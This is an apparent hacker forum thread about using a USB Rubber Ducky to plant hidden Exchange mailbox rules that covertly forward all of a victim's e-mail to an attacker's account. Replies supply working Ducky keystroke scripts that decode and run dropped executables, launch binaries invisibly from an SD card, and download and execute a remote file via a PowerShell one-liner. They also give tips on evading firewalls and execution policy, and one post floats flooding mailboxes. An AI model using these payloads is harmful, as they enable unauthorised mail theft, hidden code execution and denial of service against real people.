[Idea] auto forward all Exchange e-mails

[KSI_Syn]

So I was working on some powershell-Fu for a customer to restrict e-mails with specific keywords in the e-mail body or subject line from being delivered to a mobile device. In this effort I developed a script that creates hidden rules in exchange that are unable to be detected in the exchange management shell by an admin or in microsoft Outlook by the user. I also wrote a second tool to detect view and delete these hidden rules.

What I would like to do is adapt this for the USB Ducky where when the duck is inserted it runs a script that injects a hidden mailbox rule that will auto forward all e-mails received by the user to a specified account.

The difficulty here is that the script requires a dll that extends the standard MAPI32.dll that comes with Outlook or the MAPI CDO installer. I am looking for suggestions on the best way to approach getting the dll on the system during the duck script execution.

I am considering the Twin Duck firmware ( HID + Mass Storage ) option to see if i could copy the dll to a tmp folder prior to running the script and if i were to do that i would also like to copy the ps1 file so i would just open powershell copy the 2 files to tmp launch the Ps1 from tmp dir and then delete the dir and walk off.

any suggestions would be welcome

[overwraith]

Well, I remember there used to be a payload that would encode an exe to base 64, or something like that, and then on inject would convert it back, I don't know if the process can be applied to dll's. Exe's and dll's tend to be relatively large in terms of ducks, and would take minutes to inject. Another problem with this method is that some of the firmware has a limit on the size of the payload. Here is some code related to the process:

'File: Base64encode.vbs
Option Explicit
' common consts
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8


' getting file from args (no checks!)
Dim arguments, inFile, outFile


Set arguments = WScript.Arguments
inFile = arguments(0)
outFile = arguments(1)


Dim inByteArray, base64Encoded, base64Decoded, outByteArray
inByteArray = readBytes(inFile)
base64Encoded = encodeBase64(inByteArray)
Dim myFSO, WriteStuff
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile(outFile, ForAppending, True)
WriteStuff.WriteLine(base64Encoded)
WriteStuff.Close


private function readBytes(file)
    dim inStream
    ' ADODB stream object used
    set inStream = WScript.CreateObject("ADODB.Stream")
    ' open with no arguments makes the stream an empty container
    inStream.Open
    inStream.type= TypeBinary
    inStream.LoadFromFile(file)
    readBytes = inStream.Read()
end function


private function encodeBase64(bytes)
    dim DM, EL
    Set DM = CreateObject("Microsoft.XMLDOM")
    ' Create temporary node with Base64 data type
    Set EL = DM.createElement("tmp")
    EL.DataType = "bin.base64"
    ' Set bytes, get encoded String
    EL.NodeTypedValue = bytes
    encodeBase64 = EL.Text
end function

REM DECODE THE BASE 64 ENCODED TEXT USING A VB SCRIPT
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING cscript decoder.vbs HelloWorldBase64.txt HelloWorld.exe
ENTER
REM RUN THE RESULTING EXECUTABLE
STRING HelloWorld.exe
ENTER

One other option is to simply take a USB drive with you, and run a script with the ducky that detects the drive's insertion and copy's the dll off the drive to a specified location. That RunEXE from sd payload usually works, and in fact works best when used in this way, because the memory on the duck tends to be a little bit slow. You could literally bring a small 2 port hub, and then plug the ducky and the drive in simultaneously in that manner.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') 
do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Another option is to download a file from online using a bit of powershell. You could archive the dll with a password, and then it would be undetectable via firewall. The only problem with this route is that you need install privileges to install the archive tool, unless there is something already on site. Here is a bit of duck code that will download and install 7zip:

REM *** Navigate to %TEMP%. ***
STRING cd %TEMP%
ENTER

REM *** Delete 7zip files if they already exist. ***
STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt
ENTER

REM *** Install 7zip. ***
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\'
DELAY 500
ENTER
REM *** Delay 7 Seconds. ***
DELAY 7000
REM *** Switch from powershell back to command line. ***
STRING CMD
ENTER

Mubix wrote this:

GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

I have noticed that many computers don't allow powershell script files to be run by default. You usually have to break the code up into something that can be run from the command prompt.

And somebody explain to me how to use those show/hide boxes in posts! I cannot find the button, and these code boxes are making my post too long!

Edited May 4, 2014 by overwraith

[overwraith]

So I just figured out what base64 is. You see I had learned about it from somebody else, so I didn't fully understand the concept. Base64 and UUEncode are algorithms used in sending emails that convert binary files into a text format.

[KSI_Syn]

I think the idea with the 2 port hub may work best in this case then i could install the DLL and use duck script to run the powershell commands line by line in interactive mode, rather than trying to use a ps1 and have the PS execution policy to deal with.

I Bet This could also be adapted to eat up mailbox resources as well by setting the recipient of the message to the user or setup an auto reply on the box that is receiving the message to send messages with random garbage attachments

[overwraith]

I think it may also be possible to embed powershell commands in batch files if you need to. Don't quote me on that one though.